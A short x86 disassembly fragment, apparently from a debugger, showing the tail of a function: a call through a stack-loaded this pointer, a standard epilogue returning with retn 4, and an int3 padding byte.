003A11D8    8B4D FC         mov     ecx, dword ptr [ebp-4]
003A11DB    E8 75010000     call    003A1355
003A11E0    8BE5            mov     esp, ebp
003A11E2    5D              pop     ebp
003A11E3    C2 0400         retn    4
003A11E6    CC              int3
